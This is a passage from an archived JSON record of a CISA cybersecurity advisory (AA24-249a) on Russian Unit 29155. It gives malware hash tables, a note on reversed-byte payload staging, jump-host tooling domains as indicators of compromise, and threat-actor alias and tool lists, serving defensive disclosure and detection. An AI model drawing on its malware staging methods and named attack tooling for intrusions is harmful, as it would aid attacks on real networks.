u\".TIFF\" u\".TXT\" u\".UOP\"\r\nu\".UOT\" u\".VBS\" u\".VCD\" u\".VDI\" u\".VHD\" u\".VMDK\"\r\nu\".VMEM\" u\".VMSD\" u\".VMSN\" u\".VMSS\" u\".VMTM\" u\".VMTX\"\r\nu\".VMX\" u\".VMXF\" u\".VSD\" u\".VSDX\" u\".VSWP\" u\".WAR\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 16 of 20\n\nu\".WB2\" u\".WK1\" u\".WKS\" u\".XHTML\" u\".XLC\" u\".XLM\"\r\nu\".XLS\" u\".XLSB\" u\".XLSM\" u\".XLSM\" u\".XLSX\" u\".XLT\"\r\nu\".XLTM\" u\".XLTX\" u\".XLW\" u\".YML\" u\".ZIP\"  \r\nMalware Related to Tbopbh.jpg\r\nstage2.exe and its respective payload, Tbopbh.jpg , served as a template for other malware within Discord Cluster 1.\r\nWhile most of these other malware files have not been observed in open source reporting, malware analysts assess them as\r\npayloads that follow the unravelling process listed in Figure 1 below.\r\nFigure 1: stage2.exe Execution Process Template\r\nTable 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become\r\nDLL files, which were structured similarly to Frkmlkdkdubkznbkmcf.dll .\r\nNote: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order.\r\nAnalysts reversed the file byte order for each file into their proper portable executable format, e.g., “Functional” format. 
The\r\nhashes in Table 26 represent both byte orders.\r\nTable 26: Files Located in Discord Cluster 1\r\nFilename MD5 (Reversed) MD5 (Functional)\r\nAfgyyppsysmtddhvhhaw.dll d034fe4c71b16b6d331886c24fef2751 4074798a621232dc448b65db7b1fdd66\r\nAvbbwys.dll 422437f326b8dbe30cc5f103bde31f26 7f84263fd24f783ff72d5ae91011b558\r\nAzkebvoyswvjnrpmn.dll 562c337b8caca330da2ea6ae07ee5db6 f73d203bdf924658fd6edf3444c93a50\r\nBudoejokuqbge.dll 58e879213d81333b628434ba4aeb2751 08dfebc04eb61c9a6d87b6524c1c0f2e\r\nBwqdffttejlkeqe.dll 1c85c0d044ac837e8939564afac1eb32 8633bd2bbbb5da22c3f8751150186c42\r\nBxqbsyxfkjzmhdtfceoak.dll 7234da8ceafbe6586469f18c03cc1832 5f4df6dd8e644d59eaf182e500b5e7bf\r\nClsrncpbaucrabuobcpale.dll 618d62dd95fd9aeb855fe2ef1403dce5 955e4c198ee58e40fe92cb74ceefdf00\r\nCpdvzvzyghy.dll d40195a444526eafb0db56d95bf8655d a905d620717f75751aa94ceb88995dbc\r\nCtiktdfyauejxfak.dll d06761b2cff86035a4838110ed6ab622 2ca6bcf16ee4293a771a1cf7b7b9ee49\r\nCzxhayyankwsp.dll 59da31da4db1aa5f9a5c7c0c151422c8 de1bf141976776becd376a0dac400df6\r\nDjpajq.dll de1f9d1f0336ddcff832ad3900acd2f1 974e7c0b3660fbf18f29eac059f85ac0\r\nDmdtflkcgebf.dll 394e056cb6cb732dfd5e0d45d3dae938 4d8343c40be53d6521244fe74393d937\r\nEjcpaujkmvjndgqznimmkgd.dll b7c1a8d39f46eaf52be90e24565dd6b0 7a70d5fbbafe3454b76e3ad2f009618f\r\nEncuutwvdqbxlxh.dll 2b39eab325906b0a3ab7e584c3d67349 df4f856f783d23fb01af1e0e64bc0e20\r\nEsalfjyraquwfxcgufwzip.dll 80f0ee332a452172533ad8863bb3bc63 f4f4e55a00d2f3a433c9e5624285ac1c\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a\r\nPage 17 of 20\n\nFilename MD5 (Reversed) MD5 (Functional)\r\nFdgofjdvmmllgsxunb.dll 9345425cf07b4c39a80cd8540e08bfde eef2363744345741e09fe5380eeb4df3\r\nFkhzvcuucaprsibp.dll aecb57e20d2c0b0d9fece2cbcbcc3459 4bce4831b1dd71f19c55b3e3b5e99856\r\nFkthhyexkr.dll 58dc7c9577ff90a046359ca255c0c9f4 19cb20c4e7dbfe15c1aa284752d0fecb\r\nFqattuyxknkhv.dll 5c9e2195d10375b746b6717fdb47b5b9 2b5f159f022109a8de1bc5dd9e3138a0\r\nFqyubbzbubsge.dll 
afbb9459d4a0f60d7ffb3b3532d11bc2 8d3d4d702ba6b4be2766a41bfe5ff76e\r\nFrkmlkdkdubkznbkmcf.dll b3370eb3c5ef6c536195b3bea0120929 e61518ae9454a563b8f842286bbdb87b\r\nGsiook.dll a1b509254a0a1daa7e00d279ec974461 0e03103e8110785156105946e48ea9e0\r\nGutjuhi.dll 791a81f31a8e7090a7d5417451e09efa fba76f4eb2e7a2eb17193bebe290a198\r\nHisvswmeswmnqbvzpoxzx.dll e1a15bc13157134f542cd9c55c742460 c9d1677f4f89b95b41591b23a1dc1a63\r\nHsoahb.dll cd62d4a178705b2b90a8babd8613df93 032f5642d4fb2fdd74e6f20a13c57746\r\nIcyjkszdzgoxdfuwptkwxo.dll f34f60375bebad861a35b7c4bb0fa1c8 a66b3b22a3619f739b197d0d443b700c\r\nJdfzavlqr.dll 7fe7f33d9b5dbdf3d032d2a10e39f283 8cfef66b390f08bdbfd940922cf51650\r\nJrdggfjvve.dll b32e14a9b7de6c92cd16758fa6e23346 1220b580cef1bf22351e271773945d20\r\nJteieurqgvpgnhw.dll b85538f665fdb6c8d9a74f2df7369832 ffa68749aa3fc6495e2c49b01d964339\r\nKbuqtmznmodjzvxvwxcvho.dll 869742fb9db71fdb66f00528fe2966ec 5b884f15dc9b072d7bbad9ec2b249f38\r\nKdmvyizz.dll 2128361d8aaae1225d50c9add32006a1 9152c9de57b5647ee4ab3dff551dc8dd\r\nKfxghcmg.dll 56e0446a6d7175a0d09110bc483ddbed fc418fdda06ce5982153766dcefb71d9\r\nKrewcizfplntbwcqawfhtfpd.dll 6a4fca88ee36fecc5113e188cc39d25c 5c3b0040e2dece6e17093ae607b79044\r\nLsurhpmpyewhv.dll 143594597130e301499e5940a5fb798a 911c7e82f32f78577dcd725a7adb114d\r\nMbkzrkfasxgxtzhgpgsehip.dll 993f01861aff306df44e6475f7886f37 e4634ef9bfe7b598b857ad997445b239\r\nMhnovdgzzidqx.dll 64b9feeccf6c183b9f7138f8fc53acbb 7e0c42d33921a89724424f17c97037bd\r\nMlfampnfnmjvjnahkrawwqd.dll ddec2d79f460a881849037336ba8968f d973210977957209f255b58eb1715b12\r\nMppveiyannobrcdlkd.dll 9606b4720a0e73ef1f00505a11aab2f7 0adc2530cf348c0a3d53a680291a3d67\r\nMzhyeemgqbmamubqn.dll f772f5c65d65412f61ef5f2660e33ceb f8ffd1eab6223e31b15d0fd6c3c0472e\r\nNbbudwt.dll 875f9200b49db08c33962b0a6bd05ab9 2e035360971a817b854d7d5a2b008717\r\nNhqcfzagulwaw.dll fa97dbe84ce7717b754795fa89f13dce 601c12596dfea84c2113ae5ee59a52ec\r\nNlzhpvuzzoycqnnpl.dll d8c04ecd646a1f8537a59f63518ef3c6 
47f4534da421daf8089cf34d53f6bb6e\r\nAppendix B: Indicators of Compromise\r\nTable 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit\r\n29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or\r\nmalicious activity.\r\nTable 27: IP Addresses Associated with Unit 29155 Infrastructure\r\nThreat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform\r\nmalicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to\r\nestablish functionality for creating a jump host.\r\nTable 28: Domains Hosting Jump Host Tooling\r\nDomain Name\r\ninterlinks[.]top\r\nhttps://3proxy[.]ru\r\nhttps://ngrok[.]com (Note: This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber\r\nactors and should be investigated prior to blocking.)\r\nhttps://nssm[.]cc\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a"
	],
	"report_names": [
		"aa24-249a"
	],
	"threat_actors": [
		{
			"id": "eecf54a2-2deb-41e5-9857-fed94a53f858",
			"created_at": "2023-01-06T13:46:39.349959Z",
			"updated_at": "2026-04-10T02:00:03.296196Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Bleeding Bear",
				"Cadet Blizzard",
				"Nascent Ursa",
				"Nodaria",
				"Storm-0587",
				"DEV-0587",
				"Saint Bear",
				"EMBER BEAR",
				"UNC2589",
				"TA471",
				"UAC-0056",
				"FROZENVISTA",
				"Lorec53",
				"Lorec Bear"
			],
			"source_name": "MISPGALAXY:SaintBear",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c28760b2-5ec6-42ad-852f-be00372a7ce4",
			"created_at": "2022-10-27T08:27:13.172734Z",
			"updated_at": "2026-04-10T02:00:05.279557Z",
			"deleted_at": null,
			"main_name": "Ember Bear",
			"aliases": [
				"Ember Bear",
				"UNC2589",
				"Bleeding Bear",
				"DEV-0586",
				"Cadet Blizzard",
				"Frozenvista",
				"UAC-0056"
			],
			"source_name": "MITRE:Ember Bear",
			"tools": [
				"P.A.S. Webshell",
				"CrackMapExec",
				"ngrok",
				"reGeorg",
				"WhisperGate",
				"Saint Bot",
				"PsExec",
				"Rclone",
				"Impacket"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "03a6f362-cbab-4ce9-925d-306b8c937bf1",
			"created_at": "2024-11-01T02:00:52.635907Z",
			"updated_at": "2026-04-10T02:00:05.339384Z",
			"deleted_at": null,
			"main_name": "Saint Bear",
			"aliases": [
				"Saint Bear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"Lorec53"
			],
			"source_name": "MITRE:Saint Bear",
			"tools": [
				"OutSteel",
				"Saint Bot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bdbf873a-048d-4c5d-9d92-922327cc83a8",
			"created_at": "2023-01-06T13:46:39.387696Z",
			"updated_at": "2026-04-10T02:00:03.310459Z",
			"deleted_at": null,
			"main_name": "DEV-0586",
			"aliases": [
				"Ruinous Ursa",
				"Cadet Blizzard"
			],
			"source_name": "MISPGALAXY:DEV-0586",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "025b7171-98f8-4391-adc2-66333629c715",
			"created_at": "2023-06-23T02:04:34.120175Z",
			"updated_at": "2026-04-10T02:00:04.599019Z",
			"deleted_at": null,
			"main_name": "Cadet Blizzard",
			"aliases": [
				"DEV-0586",
				"Operation Bleeding Bear",
				"Ruinous Ursa"
			],
			"source_name": "ETDA:Cadet Blizzard",
			"tools": [
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"P0wnyshell",
				"PAYWIPE",
				"Ponyshell",
				"Pownyshell",
				"WhisperGate",
				"WhisperKill",
				"netcat",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "083d63b2-3eee-42a8-b1bd-54e657a229e8",
			"created_at": "2022-10-25T16:07:24.143338Z",
			"updated_at": "2026-04-10T02:00:04.879634Z",
			"deleted_at": null,
			"main_name": "SaintBear",
			"aliases": [
				"Ember Bear",
				"FROZENVISTA",
				"G1003",
				"Lorec53",
				"Nascent Ursa",
				"Nodaria",
				"SaintBear",
				"Storm-0587",
				"TA471",
				"UAC-0056",
				"UNC2589"
			],
			"source_name": "ETDA:SaintBear",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Elephant Client",
				"Elephant Implant",
				"GraphSteel",
				"Graphiron",
				"GrimPlant",
				"OutSteel",
				"Saint Bot",
				"SaintBot",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434059,
	"ts_updated_at": 1775826714,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.pdf",
		"text": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.txt",
		"img": "https://archive.orkl.eu/09390340ca758f19c77c734684bb4670b3a5c0ae.jpg"
	}
}